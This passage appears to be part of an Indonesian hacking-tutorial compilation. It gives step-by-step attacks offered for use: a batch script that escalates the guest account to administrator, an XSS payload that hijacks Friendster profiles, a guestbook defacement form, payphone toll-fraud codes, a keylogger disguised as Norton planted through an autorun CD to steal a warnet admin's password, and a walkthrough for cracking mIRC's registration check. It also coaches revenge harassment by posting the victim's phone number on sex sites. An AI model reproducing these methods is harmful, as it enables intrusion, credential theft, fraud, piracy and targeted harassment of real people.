Demikianlah penjelasan singkat dari saya. Semoga dapat menambah pengetahuan pembaca sekalian. Untuk pembahasan mengenai Steganography lainnya dapat pembaca cari melalui Google.

10.Trojan Apakah sebenarnya trojan itu ? Bagaimana cara kerjanya ? Nah, di sini akan saya sharing sedikit informasi mengenai trojan. Hal pertama yang perlu anda ketahui adalah pengertian tentang trojan ini. Ada beberapa point yang perlu di lihat : 1. Trojan merupakan tool yang dapat digunakan untuk memonitoring mesin lain. Pengertian umum dapat di katakan sebagai kamera yang tersembunyi yang di tempatkan di komputer target. 2. Trojan bukanlah hacking tools. Hanya saja sebagai pelengkap dalam langkah hacking. 3. Begitu anda dapat masuk ke system target, maka anda dapat memasukkan trojan ini untuk kelanjutan memonitoring, mengotrol dan mencuri password di mesin target.

Perlu anda ketahui bahwa FBI ingin mengimplementasikan Carnivore yang berguna untuk sniffing/mengetahui informasi email orang yang dimaksud, so apakah setiap orang setuju akan hal ini, tentu saja tidak ? Begitu juga dengan trojan, anda dapat menggunakannya untuk memonitoring target, apakah temen ataupun BOS. Tujuan setiap orang dalam memakai trojan tentunya berbeda-beda. Sejarah dan Definisi Trojan Asal muasal istilah Trojan Horse berasal dari Yunani di mana diceritakan para perjuang yang bersembunyi di dalam kuda trojan yang terbuat dari kayu yang sangat besar. Mereka kemudian akan keluar dari kuda kayu tsb setelah dikira pergi dari daerah tsb dan menyerang ke target-target yang ditentukan. Dan kemudian para pejuang itu akan memberikan jalan kepada para penjuang lain yang akan menyerang. Trojan dikelompokkan dalam jenis malware yaitu automated-program atau program yang dapat hidup sendiri.Trojan ini juga dianggap destruktif, hanya saja ia tidak seperti virus yang menyebarkan diri sendiri. tetapi akan terdeteksi sebagai virus. Cara kerja Trojan Cara kerja trojan sebenarnya cukup simple, hampir sama dengan dengan aplikasi Client/Server. Dimana perlu adanya program di server yang listen ke port tertentu dan kemudian anda dapat menggunakan Client application untuk connect ke port tsb. Program Server ini yang akan di tempat kan di mesin target, jika program ini telah aktif maka ia akan tersembunyi di dalam memory dan mengubah beberapa seting di mesin target. Untuk menjalankan program Server ini ada beberapa cara, melalui autoexec.bat, win.ini, ataupun file sejenis lainnya yang dijalankan pada saat mesin target di start. Adapun yang paling umum adalah menempatkannya di registry, khususnya di windows, yang akan terlihat seperti :

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] "Server"="C:\\WINDOWS\\server.exe" Program tsb tidak akan terlihat oleh user, program ini akan dapat mengambil password , setting mail, IP dan port number. Dengan adanya program server (trojan) ini yang telah aktif di computer target, maka anda dapat melakukan connection dengan menggunakan program remote(client) dan tentu saja anda dapat melakukan banyak hal tergantung banyaknya fasilitas yang ada di dalam trojan tsb. Sumber trojan dapat di download di : http://www.sinred.com http://www.tlsecurity.com http://www.y3knetwork.org http://bionet.tlsecurity.com http://www.infernoindustries.cjb.net http://www.sub7.slak.org http://www.cultdeadcow.com

11. Javascript Sampai lah saatnya pada Javascript tutorial di publish pada hari ini. Berikut ini perkenalan terlebih dahulu, nantinya akan diteruskan ke lebih dalam. Tips dan trik juga dibahas pada tutorial ini. I. Pembukaan JavaScript hanya bisa dilihat pada browser2 tertentu dan berikut versinya. Seperti browser Netscape Navigator dari versi 2.0 sampai versi terbarunya 4.x, dan Internet Explorer dari versi 3.0 sampai versi terbarunya 5.x. Tapi browser standard untuk Windows CE (MPIE - Microsoft Pocket Internet Explorer) belum mendukung JavaScript, mungkin nanti di versi berikutnya. Perlu diketahui bahwa JavaScript di dalam HTML, XML, dan WML, tetap bisa di "View Source" alias di "Copy & Paste" untuk di pakai. Kecuali mungkin dengan cara "Hide" atau meniadakan Menu di browser sehingga "Source Code" dapat disembunyikan dengan aman. Tips: - "Disable Right Click" JScript - "Full Screen Window" JScript II. Pemakaian Selalu diawali "<Script language="JavaScript">" dan diakhiri dengan "</Script>" seperti standard syntax HTML lainya. Contoh: <script language="JavaScript"> <!-- document.write("Test"); //--> </script> Dan kalau "Script" nya kita taruh terpisah di file lainnya yang selalu berakhiran ".js" bisa langsung kita panggil dengan perintah berikut ini: <script language="JavaScript" src="test.js"> </script> Seperti contoh diatas semua script ditulis didalam file: test.js Prinsip "SRC" adalah seperti <img src="...> nya "html". Jadi kita bisa taruh file .js nya di sub folder tertentu, supaya nggak gampang di ambil / di download oleh pengunjung (web site visitor). Karena untuk mengambilnya kita tinggal panggil address webnya bersama dengan filenya, nah browser akan beraksi menanyakan apakah file tersebut mau dibuka (open) atau disimpan (save). contoh: http://www.victim.com/test.js

Diingat bahwa penulisan script selalu diawali dengan "<!--" dan ditutup dengan "//-->". Alasannya karena untuk menghindari tidak terbacanya script tersebut di browser yang kuno (belum / tidak pernah diupdate) Contoh: windows 95, bawa browser IE ver. 3.51 dan si user nggak pernah update OS dan browsernya. Untuk Variable, Operators, dan Expressions nya sama dengan prinsip program lainnya. Untuk statement nya, selalu dibuka dengan "{" dan ditutup dengan "}" Dan setiap perintah selalu ditutup dengan ";" contoh: if (blah..blah) { blah..blah; } else { blah..blah; } Mengenai Object yang dapat dipakai, kita bisa lihat di DOM (Document Object Model). Object-object tersebut dapat kita pasang didalam script untuk menambah fungsi-fungsi tertentu yang tidak perlu kita tulis dalam script lagi. Fungsi dan method nya sama dengan perintah yang kita jumpai di dalam ASP (Active Server Pages). contoh: window.close(); Untuk mengembalikan nilai dalam suatu proses, kita harus menggunakan "Return" lalu diikuti variablenya. contoh: nama = "NamaTest"; if (nama!='') { return nama; } Kita dapat juga membuat fungsi dengan parameter didalam script. contoh: function tampilan(nama) { blah..blah } Untuk Event Handler nya kita bisa panggil langsung didalam sintax html contoh: <a href="blah..blah" onMouseOver="TestFunction();"> Test </a> dimana "TestFunction()" ini sudah kita tulis / ditarush didalam Script. Perlu diingat, untuk object-object dan "Event Handler" yang dipakai, perlu kita sesuaikan dengan type browsernya (Internet Explorer atau Netscape), karena ada yang bisa dipakai untuk 2 browser tersebut, dan ada juga yang harus kita spesifik ke type browsernya.

12. Jadi Admin XP Sedikit mempersimpel tulisan dari Al-k pada 16 mei 2006 tentang cara lain menjadi administrator pada win-xp sp1 dan sp 2. Ada trik yang lebih sederhana tapi nggak jauh beda dari tulisan al-k beberapa bulan lalu ….eehm…tapi beda nya disini kita nggak perlu tools apapun…hanya perlu kesabaran dalam menanti.. Ah kenapa jadi cerita,oke langsung aja yeee.. Pertama Buat dulu script pake notepad : @echo off Net localgroup administrator guest/add Exit Sudah itu simpen script diatas dengan ekstensi BAT (namanya terserah temen-temen deh ex:system.BAT,…ingat harus BAT..) Sudah jadikan tuch script,,apalagi yah???bentar lupa neh.. naaaaaah trus copy file BAT tadi ke C:\document and setting\”nick sang admin”\start menu\programs\startup\ Ini letak persamaan dari tulisan al-k,temen-temen harus sabar menunggu sampai sang admin menjalankan Komputer agar file bat yang tadi anda buat berjalan.. Kalau trik temen-temen berhasil kita bisa periksa status kita dengan perintah net user guest.dan temen-temen bisa lihat status di local group membership,..Mudah bukan.. :) namanya juga jadi admin secara illegal jadi harus sabar..hehehe..klo mau cepet minta aja buatin account ama adminnya..huahaaahaahaaa….

13. Friendster Injection

Pertama-tama lo cari target lo dulu...(acc fs yg udah masuk friendlist fs lo) trus...kasih dia testi dengan kata kata lo,,trus masukkin kode dibawah : misal contoh testi : ___BEGIN OF TESTIMONIAL____ eh...apa kabar? <img src="" id="mycode" style="height:expr/**/ession(if(pageViewerID!=pageOwnerID){document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'}); width:expr/**/ession(document.all.mycode.style.height='0px')" /></img> ___END OF TESTIMONIAL______ perhatikan: <img src="" id="mycode" style="height:expr/**/ession( script diatas adalah tag html yg dipake untuk membuka jalan agar javascript yg kita inject bisa dijalankan. if(pageViewerID!=pageOwnerID) fungsi diatas untuk mencegah agar yg punya fs gak bisa ngliat klo profilenya udah berubah... jadi perubahan ini cuma bisa dilihat sama orang lain,kecuali pemiliknya. lalu, document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'}); script diatas adalah script javascript yg fungsinya untuk menuliskan tag html semau kita kedalam sebuah testi... sehingga kita bisa merubah seluruh tampilan profile org yg telah mengapprove testi kita.. klo contoh testi diatas dibuka...bentuknya seperti ini : selama gw coba....trik ini cuma jalan di iexplore... sebenernya trik diatas bisa diakalin lg untuk kepentingan yg lain....

14.Deface Salam bwt semua. Sebelumnya saya mohon maaf atas adanya artikel ini, karena mungkin pada saat artikel ini ditulis,dua menit yang lalu baru saja saya praktekan dan behasil merubah sebagian halaman guestbook seti. Buku tamu seti tidak bisa dimasukan data atau input seperti form lain pada umumnya, mungkin sengaja di off agar tidak ada lagi pesan yang masuk. Akhirnya saya buat sendiri form yang bisa dimasukan input agar bisa memasukan data ke dalam buku tamu seti. Berikut langkah2 nya : Pertama, tulis source berikut dengan teks editor pilihan anda (notepad atau ms word) lalu simpan dengan nama form.html : <html><head><title>Deface Form</title></head><body> <form action="http://www.itmandiri.com/seti/guestbook.php" method="post"> <tr> <td>Nama</td> <td>:</td> <td><input type="text" name="nama" size="20"></td> </tr> <br> <tr> <td>E-Mail</td> <td>:</td> <td><input type="text" name="email" size="30"></td> </tr><br> <tr> <td>Pesan</td> <td>:</td> <td><textarea name="pesan" rows="5" cols="30"></textarea></td> </tr><br> <input value="Send" type="submit"> <input value="Reset" type="reset"> </form> </body></html> Kedua, buka form tersebut dengan browser anda (IE atau modzila. Etc). Ketiga, isi form layaknya anda akan mengisi buku tamu.

Ke empat, pada form pesan, masukan script berikut : <div id="Layer1" style="border: 1px none rgb(0, 0, 0); z-index: 1; left: 0px; width: 1000px; position: absolute; top: 0px; height: 10000px;background-color: #00ff00;"> <center><font color="#0000ff">DefAceD bY : name01less<br>DediCatEd tO : all haCkeR CreW<br> DeFacE iS noT hAcKeD</font></center></div> Isi pesan teragantung dari anda. Silahkan kreasikan sendiri sesuai seni anda. Setelah itu anda klik send dan lihat sendiri hasil kreatif anda.

15. Hack Telpon Umum Koin Buat Nelpon Ke Handphone Suatu ketika gw rindu sama pacar gw yang ada nun jauh di seberang pulau sana, gw pengen telp ke ponsel dia tapi sayangnya gw lagi nggak punya doku, padahal doi udah ngancem kalo gw nggak nelepon dia, gw bakal di pecat sebagai administrator di hati dia, hehehe.

Berbekal dari pengalaman dia atas maka gw coba-coba aja ngisengin telepon umum koin yang ada deket rumah gw, akhirnya dengan sedikit logika dan perasaan yang penuh rasa rindu akhirnya gw bisa nemuin kode akses illegal supaya gw bisa telepon ke ponsel melalui telepon umum koin, bingo........ Caranya si simpel aja......... 1. pertama gw masukin koin recehan duit 100 perak bekas kembalian gw beli rokok di warung tetangga.

2. abis itu sebelum koin itu masuk ke mesin box penampungan, gw langsung aja neken kode akses illegal yaitu 52995008 secara cepet dan berirama, jadi loe punya waktu kira-kira 4-5 detik buat neken keseluruhan kode yang pertama tadi

3. setelah kode pertama di teken dengan benar dan di gagang telepon terdengar bunyi tut.....tut.... tanda panggilan kosong, lalu loe teken lagi kode ke 2 yaitu #2*249 dan diikutin ma nomor ponsel yang loe tuju.....contohnya #2*249081808000111 secara cepet dan berirama.

4. langkah yang terakhir loe tinggal nunggu tu telepon ke sambung ke nomor ponsel yang loe tuju dan berdoa nggak ada yang tau apa yang loe lakuin hehehehe, and jangan lupa kalo telepon da nyambung loe masukin lagi koin ke box telepon, jumlahnya terserah loe, tergantung lamanya loe mau telepon. Singkat kata akhirnya kita punya juga yah cara buat nelpon ke handphone tapi dengan tarif PSTN, lewat telepon koin lagiii........akhir kata bagusnya kita jangan terlalu ngerugiin negara dengan sering nelepon pake cara kayak gini.....hehehehehe. Catatan : Berlaku ke seluruh operator GSM dan CDMA

16. Admin Keok |---[Table of Content 1. Introduction 2. Serangan pertama 3. Serangan kedua 4. Hari pembalasan 5. Cara pencegahan 6. Penutup [+] Kesimpulan [+] Referensi 1. Introduction Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie. Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna. Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure. 2. Serangan pertama Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut: ---[1 Bukalah Notepad kemudian ketik satu baris script berikut: open=nav.bat Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save]. ---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut: @echo off echo Norton Antivirus 2006 echo Scanning disk drive... echo Please wait... copy navw32.exe %windir%\navw32.exe call %windir%\navw32.exe echo. echo. echo.

echo. echo. echo. echo. echo. Scanning complette! No virus threat detected! echo. cls Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save]. ---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan. ---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD. Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla." Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut: Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden. Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel. Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua. 3. Serangan kedua Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya.." Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger. Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan. Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam. Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya. Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia: Dear all.. gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin) gwe tunggu 24 jam lho!! Atau jika berbahasa Inggris: Dear, Wanna play "freestyle" with mw? Please call me : 062-021-blablabla You may F**k me for free!! Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!! :) Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya :) Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah :) 5. Pencegahan Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif. 6. Penutup ---[+ Kesimpulan Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.

---[+ Referensi Self implementing Note: Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki penampilan dan perilaku anda! Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.

17. Keygen Sori judulnya terlalu mengada-ada, karena sebenarnya sudah jadi rahasia umum, bagaimana sang cracker mampu memecahkan untaian kode untuk menembus sistem proteksi/keamanan pada sebuah software, jadi artikel ini hanya ditujukan untuk yang belum pada ngerti aja.

Ini berawal ketika saya membaca salah satu majalah komputer yang baru saya beli, pada

majalah ini saya temukan tulisan kurang lebih seperti berikut : “Bagaimana bisa (mungkin), kode dan algoritma yang notabene sangat rahasia bagi sebuah produsen aplikasi mampu dipecahkan oleh sipembuat keygen (cracker)?” (PCMedia edisi 06/2006) , mungkin sebagian orang akan kebingungan menemukan jawabannya, disini ada 3 kemungkinan mengapa kita bingung dalam menjawab pertanyaan diatas:

1. Algoritma yang diciptakan oleh sang produsen software bersifat rahasia, dan tidak mungkin sang produsen menemui sang cracker dirumahnya untuk memberitahukan algoritma yang baru dia ciptakan.

2. Aplikasi yang dibuat oleh sang produsen sangatlah berharga, pastilah sang produsen akan memproteksi aplikasinya agar tidak mudah dibajak.

3. Sang penanya tidak pernah menengok dunia bawah tanah (komunitas underground) seperti Jasakom ini, :-P

Baiklah pertanyaan tersebut akan saya jawab lewat artikel ini. Apa itu Key Generator (keygen)? Sebenarnya pertanyaan ini nggak perlu saya jawab, karena saya yakin 98% pengguna

komputer Indonesia yang masuk peringkat 5 besar pembajakan software terbanyak di Asia atau mungkin malah di dunia, pasti pernah melihat, memakai atau merasakan yang namanya keygen!.

Baiklah daripada kebanyakan ngomong lebih baik kita mulai tutorial cracking kita. Cracking Start Sebelum kita mulai saya harus minta ma‟af dulu pada Khaled Mardam-Bey, karena saya

akan menggunakan aplikasi beliau untuk eksperimen kita kali ini. Untuk contoh saya hanya akan menjadikan aplikasi mIRC sebagai korban.

Alat-alat yang perlu kita gunakan untuk cracking kita adalah :

1. W32dasm (Wind*ws 32 Disassembly). 2. Kalkulator Wind*ws. 3. Cheat Engine (penulis pake versi 4.4), aku gak pake softice karena softice

ku gak bisa jalan di XP. Untuk download Cheat Engine: http://www.heijnen1.demon.nl/

4. Aplikasi target : mIRC terbaru saat ini yaitu versi 6.16. <- Khaled I‟m sory for this.

5. UltraEdit (kalo perlu) 6. Wafer coklat (aku suka sekali coklat) :-)

Sebenarnya Cheat Engine itu aplikasi untuk mencurangi game dibuat oleh dark_byte,

tapi malah saya salah gunakan untuk cracking.. he.he. karena aplikasi ini sendiri memiliki bebrapa kelebihan yang tidak dimiliki oleh program debuger lain, seperti stealth untuk mengatasi sistem proteksi anti debug. Dan yang lebih asik lagi tool ini bisa untuk bypass password pada beberapa aplikasi securtiy (penulis udah pernah bobol beberapa komputer temen yang di kunci pake password menggunakan tool ini :-P )

Oke kita mulai aja Instal dulu mIRC v6.16, W32Dasm dan Cheat Engine (semua kecuali kalkulator).

Setelah proses instal selesai jalankan mIRC, kamu bakalan ngeliat jendela nag (nag screen) yang menandakan bahwa aplikasinya masih versi trial 30 hari, dan mengharapkan anda untuk membelinya.

Klik “Continue”, Pada jendela “mIRC Options” klik “Cancel”. Klik menu “Help>Register”. Nah kamu bisa liat jendela berisi 2 Textbox, satu untuk username dan yang satu untuk

serial number. Masukkan nama “4NVIe” pada “Full Name” dan masukkan “12345” pada “Registration

Code”. Klik OK atau tekan Enter, apa yang terjadi ?

“The registration name and number you have entered are not valid. Please make sure you are entering…bla..bla..bla..”

Tulisan inilah yang muncul, didukung oleh lambang X berwarna merah. Hiks, Tenang

jangan kawatir. Sekarang jalankan Cheat Engine nya. Maka akan tampak jendela seperti ini :

Klik tombol bergambar komputer di pojok kiri atas, setelah jendela process list terlihat

cari proses bernama “mirc.exe”

Setelah Cheat Engine meng-attach proses „mirc.exe‟ langkah kita selanjutnya adalah mendebugnya dengan cara mengklik tombol “Memory view” pada Cheat Engine. tampaklah jendela berikut

Klik menu View>Enumerate Dll‟s and symbol, disitu akan terlihat beberapa symbol dari

“Dynamic Link Library” milik Wind*ws (DLL). Klik pada “USER32” dan carilah fungsi “GetWindowTextA”, he..he.. pasti sulit karena gak urut pake abjad (itulah kekurangan Cheat Engine) setelah ketemu dobel klik pada fungsi tsb dan klik “Close”.

Memory Viewer akan menunjukan alamat fungsi tsb. Tekan F5 untuk membuat breakpoin, klik OK pada jendela registrasi di mIRC, gagal!. Kita coba lagi dengan fungsi lain “GetDlgItemTextA”, lepaskan dulu breakpoin pada fungsi pertama dengan cara menekan tombol F5, ngulang cari lagi deh”, setelah membuat breakpoin pada fungsi kedua, isi nama dan nomor serialnya lagi pada mIRC dan tekan tombol OK. Gagal Lagi!!!, Sial!. Karena berkali-kali gagal, kita jalankan W32Dasm, Klik menu Disassembly>Open file to disassembly… cari file mirc.exe pada direktori anda menginstal mIRC. Setelah proses loading selesai Klik menu “Search>Find text” pada jendela Find, isi teks dengan “Register…” gak pake tanda kutip (string ini aku temukan pada tubuh exenya yang aku buka pake ultraedit), Klik “Find Next” 3 kali, tekan “Page Up” 8 kali, hingga tampak :

:004C764C 8D94240C010000 lea edx, dword ptr [esp+0000010C] :004C7653 8D4C2408 lea ecx, dword ptr [esp+08] :004C7657 E8A4FDFFFF call 004C7400 :004C765C 85C0 test eax, eax :004C765E 740E je 004C766E lea edx, dword ptr [esp+0000010C] kode assembly ini akan memasukkan alamat nomor

serial yang kita masukan tadi ke register EDX. lea ecx, dword ptr [esp+08] kalo yang ini akan memasukkan alamat nama kita ke register

ECX. call 004C7400 nah! pemanggilan inilah yang akan mengkalkulasi nama dan nomor yang

kita masukkan dan akan menghasilkan nilai pengembalian pada register EAX, jika nama/nomor serial valid maka register EAX akan bernilai 1, tapi kalo gak valid maka register EAX akan bernilai 0 (zero).

test eax, eax cek apakah EAX 0/1. je 004C766E jika EAX = 0 maka lompat. Kita bisa saja melewati lompatan ini dengan

cara me-NOP nya, tapi dengan cara ini akan merubah CRC dari file eksekutebelnya (crack kasar), jadi gak bagus, apalagi jika aplikasi yang akan kita crack dilengkapi sistem proteksi CRC, yang mana program gak akan jalan jika terjadi perubahan CRC!, atau mungkin kita gak

bisa update karena gak pake nomor serial!, jadi kita pake cara kelemubutan aja dengan buat keygennya.

Lanjut! Lihat pada alamat 004C7657, karena kita sudah tahu dimana alamat pengecekan nama

dan serial berada, sekarang kita berpindah ke Cheat Engine, pada jendela “Memory Viewer” klik kanan pada kolom pertama,

Pada popup menu klik “Go to address”, pada jendela “Go to address” masukkan alamat

yang kita dapatkan tadi yaitu “004C7657” tanpa tanda kutip, klik “OK”, maka akan tampak :

Sekarang buat breakpoin pada alamat 004C7657 dengan menekan tombol F5, pindah ke

mIRC, masukkan nama dan nomor serial, klik “OK”, proses berhenti, balik lagi ke Cheat Engine, trace masuk ke prosedur call 004c7400 dengan cara menekan tombol F7, setelah masuk coba trace over dengan menekan tombol F8 sampai terlihat

Lea esi, [eax+10] ;masukkan alamat efektif dari nomor serial yang kita masukkan ke ESI Mov dl, [eax] ;masukkan 1 karakter dari nomor serial ke dl Inc eax ;eax = eax+1 Test dl, dl ;apakah karakter udah habis? Jne 004c7518 ;kalo belum lompat ke 004c7518 (looping) Sub eax, esi ;eax kurangi esi hasilnya eax berisi jumlah karakter dari serial number yang

kita masukkan atau sama dengan perintah VB len(esi) Cmp eax, ecx ;apakah jumlah karakter Jae 004c7532 ;lebih dari 4? Jika ya lompat ke 004c7532 Setelah kita trace over sampai sini masuklah ke alamat 004c7532 dengan menekan

tombol F7, setelah masuk kita akan melihat kode berikut :

Mov ebx,[esp+10] ;masukkan alamat efektif tempat nomor serial berada ke EBX, kalo gak

percaya coba trace dulu supaya kode dieksekusi trus klik kanan pada kolom sebelah bawah dan pada menu popup klik “Goto address”, ketik “ebx” (gak pake kutip) tekan enter, maka akan terlihat nomor serial yang kita masukin tadi.

Push 2d ;masukkan dalam stack nilai 2D (heksadesimal dari 45=karakter “-“) Push ebx ;masukkan nilai EBX ke stack Call 00570260 ;rutin untuk mengecek apakah terdapat karakter “-“ pada nomor serial

kita? Ups! Ternyata harus ada tanda “-“ pada nomor serialnya, mungkinkah format serialnya

begini? : “12345-12345”. Oke karena harus ada tanda “-“ pada nomor serialnya maka kita harus ulangi

memasukan nomor serial dengan format seperti diatas, buat breakpoin pada alamat 004C7539 biar gak trace ulang (tekan F5), tekan F9 dua kali sampai kotak dialog penolakan muncul, isi “Full Name” dengan “4Nvie” (gak pake kutip) dan “Registration Code” dengan “12345-12345” (gak pake kutip), tekan Enter, proses berhenti, kembali ke Cheat Engine, tekan F9

Mov esi,eax Add esp, 08 Test esi,esi

Je 004c7525 Setelah kode ini dieksekusi register ESI akan berisi alamat karakter “-“ pada nomor serial

